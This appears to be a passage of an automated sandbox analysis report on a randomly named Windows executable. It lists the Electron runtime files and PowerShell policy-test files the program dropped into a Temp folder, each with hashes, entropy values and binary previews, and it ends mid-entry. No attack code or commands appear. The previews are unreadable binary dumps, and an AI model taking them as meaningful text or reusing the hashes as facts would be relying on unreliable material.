                                                                                                                                                                      SHA-256:F528E698B164283872F76DF2233A47D7D41E1ABA980CE39F6B078E577FD14C97
                                                                                                                                                                      SHA-512:69DA19053EB95EEF7AB2A2D3F52CA765777BDF976E5862E8CEBBAA1D1CE84A7743F50695A3E82A296B2F610475ABB256844B6B9EB7A23A60B4A9FC4EAE40346D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........E...h.....i.....j.....k.....l.....n."...o.'...p.4...r.:...s.K...t.T...v.i...w.v...y.|...z.....|.....}.....................................................................................-.....>.....E.....N.....g.....p.....{...................................................../.....?.....K.....X.....y...........................................................<.....R.....W.....].....l.....y.....}.....................................................+.....9.....A.....I.....P.....U.....c.....s...............................................%.....J.....d.....m.....y...........................................................+.....2.....5.....6.....B.....L.....V.....].....g.............................O.....^.....k.................................................................".....5.....Q.....z....................................... .....".....%.....(.$...*.D...+.G...,.e........./.....0.....1.....3.....4.....5.....6.D...7.U...8.j...9.y...<.....=.....>.....?.....@.....A.....C.$...D.+.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\locales\am.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):613642
                                                                                                                                                                      Entropy (8bit):4.894733266944232
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:b3pIuPzq8xSTwO8sgjZz5E9VJAVtnuviQix30jH8+I:b3plq8xLO8zjZz5E9VJAVtSiQO
                                                                                                                                                                      MD5:2009647C3E7AED2C4C6577EE4C546E19
                                                                                                                                                                      SHA1:E2BBACF95EC3695DAAE34835A8095F19A782CBCF
                                                                                                                                                                      SHA-256:6D61E5189438F3728F082AD6F694060D7EE8E571DF71240DFD5B77045A62954E
                                                                                                                                                                      SHA-512:996474D73191F2D550C516ED7526C9E2828E2853FCFBE87CA69D8B1242EB0DEDF04030BBCA3E93236BBD967D39DE7F9477C73753AF263816FAF7D4371F363BA3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........W...h.....i.....j.'...k.6...l.A...n.I...o.N...p.[...r.a...s.r...t.{...v.....w.....y.....z.....|.....}.........................................................................7.....S.....i.........................................L.....k.....m.....q...................................1.....A.....`.............................".....4.....=.....\.....~...................................5.....Q.....W.....Z.....i.............................K.....z.....................................................8.....G.....`.............................".........................................>.....A.....s.............................@.....G.....J.....K.....W.....`.....|.......................<............................./.....g.....w...............................................3.......................E.....j.....p.....x..................... .....".....%.6...(.c...*.....+.....,.........../.....0.....1.]...3.y...4.....5.....6.K...7.s...8.....9.....;.....<.....=.....>.?...?.I...@.i...A.....C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\locales\ar.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):671738
                                                                                                                                                                      Entropy (8bit):4.903433286644294
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:gjptqBycpX8vYULIrmhkH+P5NNb++YTzgpPMgSENeX:BB2um5S++
                                                                                                                                                                      MD5:47A6D10B4112509852D4794229C0A03B
                                                                                                                                                                      SHA1:2FB49A0B07FBDF8D4CE51A7B5A7F711F47A34951
                                                                                                                                                                      SHA-256:857FE3AB766B60A8D82B7B6043137E3A7D9F5CFB8DDD942316452838C67D0495
                                                                                                                                                                      SHA-512:5F5B280261195B8894EFAE9DF2BECE41C6C6A72199D65BA633C30D50A579F95FA04916A30DB77831F517B22449196D364D6F70D10D6C5B435814184B3BCF1667
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........*...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.!...v.6...w.C...y.I...z.X...|.^...}.p.....x.....}.................................................................'.....^.....n...................................'.....*...........V.....x.........................................G.....].....p...............................................o...................................................../.....Q.....s.......................(....._.....i.....q.....x.............................#.....:.....m.......................).....Z.....k.........................................$.....?.....U.....k...........................................................p.................7.....L.....h.......................!.....1.....9.....E.....g.......................&.....Z............................................. .'...".D...%.x...(.....*.....+.....,.6.....M.../.~...0.....1.....3.....4.....5.,...6.....7.....8.....9.....;.....<.:...=.P...>.....?.....@.....A.....C.....D.....E.!...F._.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\locales\bg.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):701716
                                                                                                                                                                      Entropy (8bit):4.66095894344634
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:7Od6KqVw2iILlY+dAs1aQUfjoaVV4FH2mFxvx35uKN3CuKb7szmV2Jfu64K+z5jG:KsKqJi6lY+dAs1aQU7yZx35uK4XQzQI9
                                                                                                                                                                      MD5:A19269683A6347E07C55325B9ECC03A4
                                                                                                                                                                      SHA1:D42989DAF1C11FCFFF0978A4FB18F55EC71630EC
                                                                                                                                                                      SHA-256:AD65351A240205E881EF5C4CF30AD1BC6B6E04414343583597086B62D48D8A24
                                                                                                                                                                      SHA-512:1660E487DF3F3F4EC1CEA81C73DCA0AB86AAF121252FBD54C7AC091A43D60E1AFD08535B082EFD7387C12616672E78AA52DDDFCA01F833ABEF244284482F2C76
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........P...h.....i.....j.....k.%...l.0...n.8...o.=...p.J...r.P...s.a...t.j...v.....w.....y.....z.....|.....}.........................................................................F.....h...............................................[.........................................#.....Q.....x...................................[.........................................T...............................................'.....U......................./.....c...............................................>.....s.............................4.....^................. .....9.....V.....l...................................\...............................................&.....B.....S.....v...............................................O.....r...................................0.......................9.....z.......................-.....[............... .....".....%.....(.E...*.q...+.t...,.........../.....0.....1.....3.....4.....5.....6.....7.....8.....9.....;.3...<.G...=._...>.....?.....@.....A.....C.F.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\locales\bn.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):904943
                                                                                                                                                                      Entropy (8bit):4.273773274227575
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:wqf22AwWk+ADszaaH0PaMadiMNKVbVtQW01jilDouMGsW2uMBVr+9RU4yVS5PMxq:1zW/AMfafVoCp8YbkJBbdJ2DB5y0XlRB
                                                                                                                                                                      MD5:5CDD07FA357C846771058C2DB67EB13B
                                                                                                                                                                      SHA1:DEB87FC5C13DA03BE86F67526C44F144CC65F6F6
                                                                                                                                                                      SHA-256:01C830B0007B8CE6ACA46E26D812947C3DF818927B826F7D8C5FFD0008A32384
                                                                                                                                                                      SHA-512:2AC29A3AA3278BD9A8FE1BA28E87941F719B14FBF8B52E0B7DC9D66603C9C147B9496BF7BE4D9E3AA0231C024694EF102DCC094C80C42BE5D68D3894C488098C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........K...h.....i.....j.....k.$...l./...n.7...o.=...p.J...r.P...s.a...t.j...v.....w.....y.....z.....|.....}.............................................................................................................7.....a.......................".....$.....(.....P.......................+.....T.....p.......................H...................................M.....c...........5.....D....._.........................................A.....z.................B.......................................................................H.....a.....s.........................................B.....g.............................3.....W.....{...............................................>...........j...................................6.....R.........................................g...........9.....u...........V...................................8... .M...".....%.....(. ...*.\...,._........./.....0.....1.`...3.....4.....5.....6.....7.....8.E...9.d...;.....<.....=.....>."...?.5...@.j...A.....C.3...D.S.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\locales\ca.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):426906
                                                                                                                                                                      Entropy (8bit):5.400864409916039
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:+XnGrijIs3cSlFEYLCJBB43nbhjJSwmrwiwWzM1ldLbpuQ16BtryBBwIle3nei3X:iNV4ossMNu51hnW5CptA
                                                                                                                                                                      MD5:D259469E94F2ADF54380195555154518
                                                                                                                                                                      SHA1:D69060BBE8E765CA4DC1F7D7C04C3C53C44B8AB5
                                                                                                                                                                      SHA-256:F98B7442BEFC285398A5DD6A96740CBA31D2F5AADADD4D5551A05712D693029B
                                                                                                                                                                      SHA-512:D0BD0201ACF4F7DAA84E89AA484A3DEC7B6A942C3115486716593213BE548657AD702EF2BC1D3D95A4A56B0F6E7C33D5375F41D6A863E4CE528F2BD6A318240E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........N...h.....i.....j.....k.!...l.,...n.4...o.9...p.F...r.L...s.]...t.f...v.{...w.....y.....z.....|.....}...............................................................................6.....O.....o.....|.....................................................2.....J.....j.....q...........................................................1.....;.....M.....].......................................................................D.....i.................................................................+.....2.....?.....u.........................................".....5.....F.....b.....e.....}.............................................................................&.....h......................./.....P.....s.....................................................4.....P.....|...............................................:.....F... .Q...".g...%.....(.....*.....+.....,.........../.-...0.2...1.h...3.x...4.....5.....6.....7.....8.....9.(...;.6...<.D...=.R...>.l...?.v...@.....A.....C.....D.....E...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\locales\cs.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):436202
                                                                                                                                                                      Entropy (8bit):5.843819816549512
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:U4ftEfqE2jv7ShUjBA59wjd558YAGKND9Gto8QV:U41HE2jjShqywjd558YAbNDcI
                                                                                                                                                                      MD5:04A680847C4A66AD9F0A88FB9FB1FC7B
                                                                                                                                                                      SHA1:2AFCDF4234A9644FB128B70182F5A3DF1EE05BE1
                                                                                                                                                                      SHA-256:1CC44C5FBE1C0525DF37C5B6267A677F79C9671F86EDA75B6FC13ABF5D5356EB
                                                                                                                                                                      SHA-512:3A8A409A3C34149A977DEA8A4CB0E0822281AED2B0A75B02479C95109D7D51F6FB2C2772CCF1486CA4296A0AC2212094098F5CE6A1265FA6A7EB941C0CFEF83E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......../...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.(...v.=...w.J...y.P...z._...|.e...}.w.........................................................................................#.....,.....9.....V.....d.........................................!.....?.....L.....X.....d.....o.....................................................".....4.....E.....{.......................................................................8.....O.....d.....{.................................................................H.....Z.....h.....................................................9.....<.....J.....X.....h.....w.................................................................!.....p.......................".....>.....s.....................................................&.....N.....n.........................................+.....5... .=...".N...%.u...(.....*.....+.....,.........../.....0.....1.H...3.V...4.s...5.....6.....7.....8.....9.....<."...=.,...>.A...?.I...@.[...A.....C.....D...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\locales\da.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):396104
                                                                                                                                                                      Entropy (8bit):5.454826678090317
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:Q3rSn4RJ28687mlwlGXaJwZkqEb1Phv6VP5yarXGzOJixhd4/TWwS:eND/xqkqEO5nrFTq
                                                                                                                                                                      MD5:1A53D374B9C37F795A462AAC7A3F118F
                                                                                                                                                                      SHA1:154BE9CF05042ECED098A20FF52FA174798E1FEA
                                                                                                                                                                      SHA-256:D0C38EB889EE27D81183A0535762D8EF314F0FDEB90CCCA9176A0CE9AB09B820
                                                                                                                                                                      SHA-512:395279C9246BD30A0E45D775D9F9C36353BD11D9463282661C2ABD876BDB53BE9C9B617BB0C2186592CD154E9353EA39E3FEED6B21A07B6850AB8ECD57E1ED29
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........[...h.....i.)...j.5...k.D...l.O...n.W...o.\...p.i...r.o...s.....t.....v.....w.....y.....z.....|.....}.........................................................................?.....M.....].....q.....y...........................................................4.....K.....R.....].....m.....t...........................................................5.....F.....u.............................................................................9.....T.....m.....w.....z................................................................./.....E.....k.............................................................................+.....2.....5.....6.....=.....F.....L.....S.....^.............................X.....n.......................................................................F.....[................................................... .....".....%.,...(.T...*.....+.....,.........../.....0.....1.....3.....4.%...5.=...6.o...7.....8.....9.....;.....<.....=.....>.....?.....@.....A.%...C.B...D.L.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\locales\de.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):424277
                                                                                                                                                                      Entropy (8bit):5.503137231857292
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:TFigju3qg4wajEzUKnYm31SOmhqYl51gHNiOIkCJD:TFiecqg1aqHSOu599kCJD
                                                                                                                                                                      MD5:8E6654B89ED4C1DC02E1E2D06764805A
                                                                                                                                                                      SHA1:FF660BC85BB4A0FA3B2637050D2B2D1AECC37AD8
                                                                                                                                                                      SHA-256:61CBCE9A31858DDF70CC9B0C05FB09CE7032BFB8368A77533521722465C57475
                                                                                                                                                                      SHA-512:5AC71EDA16F07F3F2B939891EDA2969C443440350FD88AB3A9B3180B8B1A3ECB11E79E752CF201F21B3DBFBA00BCC2E4F796F347E6137A165C081E86D970EE61
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:............h.V...i.g...j.s...k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.............#.....+.....3.....;.....B.....I.....P.....Q.....R.....T...........................................................$.....:.....<.....@.....h.....}.....................................................-.....Q.....d.....j.....s...............................................4.....K.....O.....R.....[.....t...................................D.....Q.....[.....c.....j.....p.....}...............................................0.....d.................................................................6.....O.....i.....p.....s.....t.....~...................................=...................................6.....?.....Q.....[.....h.....m.....r...................................(.....Y.....u.....{........................... .....".....%.....(.....*./...+.2...,.P.....a.../.w...0.....1.....3.....4.....5.....6.A...7.U...8.i...9.w...;.....<.....=.....>.....?.....@.....A.....C.....D.%.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\locales\el.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):769050
                                                                                                                                                                      Entropy (8bit):4.75072843480339
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:H/58dBquNw2202pgtZSWjZ4LIbsJvaP5A3HKQiEQBR07391qf2utKMaBlS9WffFR:H8BquNw2202pgtsWjyLrJvaRA3HtiEQG
                                                                                                                                                                      MD5:9528D21E8A3F5BAD7CA273999012EBE8
                                                                                                                                                                      SHA1:58CD673CE472F3F2F961CF8B69B0C8B8C01D457C
                                                                                                                                                                      SHA-256:E79C1E7A47250D88581E8E3BAF78DCAF31FE660B74A1E015BE0F4BAFDFD63E12
                                                                                                                                                                      SHA-512:165822C49CE0BDB82F3C3221E6725DAC70F53CFDAD722407A508FA29605BC669FB5E5070F825F02D830E0487B28925644438305372A366A3D60B55DA039633D7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........M...h.....i.....j.....k.....l.(...n.0...o.5...p.B...r.H...s.Y...t.b...v.w...w.....y.....z.....|.....}.........................................................................P.....w.............................B.....N.....Z...................................+.....x...................................h.....y.............................&.....C.....a.................,.....4.....H.....o...................................!.....M.................8...............................................1....._.....w.................!.....2.....q.................J.....a.........................................,.....O.....|.........................................!.....3.....F.....^.......................,.................<.............................(.....;.....I.......................M.................T.................................../... .B...".e...%.....(.....*.7...+.:...,.X........./.....0.....1.m...3.....4.....5.#...6.....7.....8.....9. ...;.a...<.w...=.....>.....?.....@.....A.B...C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\resources.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5245458
                                                                                                                                                                      Entropy (8bit):7.995476669559971
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:98304:HLYxfQVcnNWz49PDq2AwpmqdhBh1Dd42cjrwrbHw4o0DPelwG3RC:H0pQGcMButuBhpd4jkrU4oeelrRC
                                                                                                                                                                      MD5:7D5065ECBA284ED704040FCA1C821922
                                                                                                                                                                      SHA1:095FCC890154A52AD1998B4B1E318F99B3E5D6B8
                                                                                                                                                                      SHA-256:A10C3D236246E001CB9D434A65FC3E8AA7ACDDDDD9608008DB5C5C73DEE0BA1F
                                                                                                                                                                      SHA-512:521B2266E3257ADAA775014F77B0D512FF91B087C2572359D68FFE633B57A423227E3D5AF8EE4494538F1D09AA45FFA1FE8E979814178512C37F7088DDD7995D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:............f.......P'....$*.....-...43@...4.H...4XK...4i]...4.f...4.m...4?p...4.v...4.x...4.z...4.~...4....4.....4?....4.....4....4.....4=....4z....4a....4....4....4.....4.....4.....43....4.....4.....4J....4J....4.....4.....4#....4j....4J....5.....5....v5.:..w5.;..x5.<..y5.>..z5a?...5.?...5.D...5.E...5dJ...5.O...5.V...5.f...5.w...5.x...5.|..n<&...x<....y<....z<....{<....|<....<+....<r....<8....</....<....V@....W@....X@x...Y@d...Z@....[@2...\@O...]@....^@...._@hh..`@....<A....=A.....P.~...Pe....PX....P.....P.....Pt....P.....P3....Q.....QF....Q.....Q.....Q.....Q[....QA....Q.....Q.....QW....Q.....Qv....Q9!...Q.'...QF....Q.1..,Q.F..-QsL...QLN../Q.P..0Q.U..1Q.i..2Q.j..3Q.k..4QEm..5Q.o..6Q.r..7Q~t..8QEw..9Q!x..:Q.z..;Ql...<Q)...=Q....>Q ...?Q"....R....Ry....}.....}. ...}._...}%a...}[h...}.h...}[j...}Lo...}....}.&...}.....}.6...}4;...}.=...}&B...}mG...~.O...~.d...~.q...~.t...~.|...~.}..!~...."~....#~...$~|...&~....'~A...(~....)~....*~t$..+~.4..,~.6..-~V8...~.;../~i<..0~|=..1~iA..2~.H

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\snapshot_blob.bin

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):273328
                                                                                                                                                                      Entropy (8bit):3.2521181832662194
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:MpeVehd7eASb6iAGm4hmWRSJTnBSki+TfUNp2Zg+TEJ0xEI2tWaw8MCZ72T04GO9:YdyNm4mWRSJTBSXsU1vJzbYB
                                                                                                                                                                      MD5:8915DD2A6D6B4EBF9A16C77FE063D8DE
                                                                                                                                                                      SHA1:A03132ADCB99A82BA269D56AB6577CCFD1BB08E5
                                                                                                                                                                      SHA-256:C1802B29B13663A8890031411270866834246931F71F41397682DD88FA16D485
                                                                                                                                                                      SHA-512:ABD93CDD634AD4D38B7E3714B183335CDDB9E3AD14660247CC7285066C95342AC8595D68CD0868B8512E73BB656AB54386045533F998576B2CD6501BF456CD2C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:............11.2.214.9-electron.0............................................;...b...........:..a........a........a........ar.......a........a..............Y.D............`$.........D............`$.......D............`$.......m.D............`$.........D............`D.........D............`$.......1.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....I.....@..F^......`.....(Jb....M.....@..F^..`.....H...IDa........D`....D`....D`.......D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.............................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\v8_context_snapshot.bin

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):588152
                                                                                                                                                                      Entropy (8bit):4.83735352889622
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:bFzofuYUahtcOm3A0Tg8zY8y4XrxXSIIBYgHi:JMfu/fTY8zrM9C7
                                                                                                                                                                      MD5:4CD37EA771EA4FE2F3AD46217CC02206
                                                                                                                                                                      SHA1:31680E26869B007E62550E96DBF846B3980D5B2B
                                                                                                                                                                      SHA-256:95F7B8664306DA8D0073A795E86590ED6FDAEDE5F489132E56C8779F53CF1ED5
                                                                                                                                                                      SHA-512:E1369734CBE17AAF6DD3CEEFB57F056C5A9346D2887A7D3EE7ED177386D7F5E624407869D53902B56AB350E4DED5612C3B0F52C2DD3EFA307E9947701068A2A0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.........c~.11.2.214.9-electron.0...........................................H...P<..........X...........a........a........aT.......ar.......a........a..............Y.D............`$.........D............`$.......D............`$.......m.D............`$.........D............`D.........D............`$.......1.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....I.....@..F^......`.....(Jb....M.....@..F^..`.....H...IDa........D`....D`....D`.......D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.....................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vk_swiftshader.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5334528
                                                                                                                                                                      Entropy (8bit):6.335261874351837
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:RKJSTu+985EkjstvgsnpkkHF3y/AFIB7:RQq85EkjstvgsnpkkJETB
                                                                                                                                                                      MD5:524B0D85D992F86A7F26C162F3DBB91C
                                                                                                                                                                      SHA1:BC9C862FD01F6134A0514DCB63F9FAB7A61CE269
                                                                                                                                                                      SHA-256:5B2FFB78FA963F2DEA5A7FCF7676FC3ABA243C4372D7528C8F1FC8F726D0A3FA
                                                                                                                                                                      SHA-512:422A18AF294D7551224E05F5F4F5DCFA51B3455C2E61FC285FD2B95B50274EB77FF317647E17B0E7D47459B4FED19C7C88C90E0878F2269A78D598B1196401D8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......A..........;.......................................R...........`A..........................................L.~...&.L.P....`R.......P.<_...........pR.X}...L.......................L.(...@.A.@.............L.P............................text.....A.......A................. ..`.rdata...(....A..*....A.............@..@.data...p.....M.......M.............@....pdata..<_....P..`...LO.............@..@.00cfg..8.....Q.......P.............@..@.gxfg....,....R.......P.............@..@.retplne.....0R.......P..................tls....Q....@R.......P.............@..._RDATA..\....PR.......P.............@..@.rsrc........`R.......P.............@..@.reloc..X}...pR..~....P.............@..B................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vk_swiftshader_icd.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):106
                                                                                                                                                                      Entropy (8bit):4.724752649036734
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                                                                                                      MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                      SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                      SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                                                                                                      SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vulkan-1.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):928256
                                                                                                                                                                      Entropy (8bit):6.558092096809165
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:IEW7F7IyaHx/fempu2e6Z5WODYsHh6g3P0zAk7o:e7IyaBfempa6Z5WODYsHh6g3P0zAk7
                                                                                                                                                                      MD5:6D4ADF9A48DBCE2E480EF10B1338CA3C
                                                                                                                                                                      SHA1:CEB77D5768C6EDA84EC8E0B43821B8027764DE81
                                                                                                                                                                      SHA-256:4CCA7E6C05B2D988926E4B4D0C8FF91D6356F18DE8BF40B440251180E5CAD6A7
                                                                                                                                                                      SHA-512:106DB7309B40AFABB1CCA911B204C83129683DC116AEC198568C4228C581BF0DE5963BFFC0B50DF8F43EC355264F271FC383F4155BE45350C0D7DD429C7F7F09
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......................................................................`A........................................H...<!......P...............<o..............T...t.......................X...(...@...@............................................text............................... ..`.rdata..............................@..@.data....L...p... ...V..............@....pdata..<o.......p...v..............@..@.00cfg..8....0......................@..@.gxfg...P(...@...*..................@..@.retplne.....p...........................tls................................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..T...........................@..B................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1b11lsyf.1rd.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1r51ucz3.sgz.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
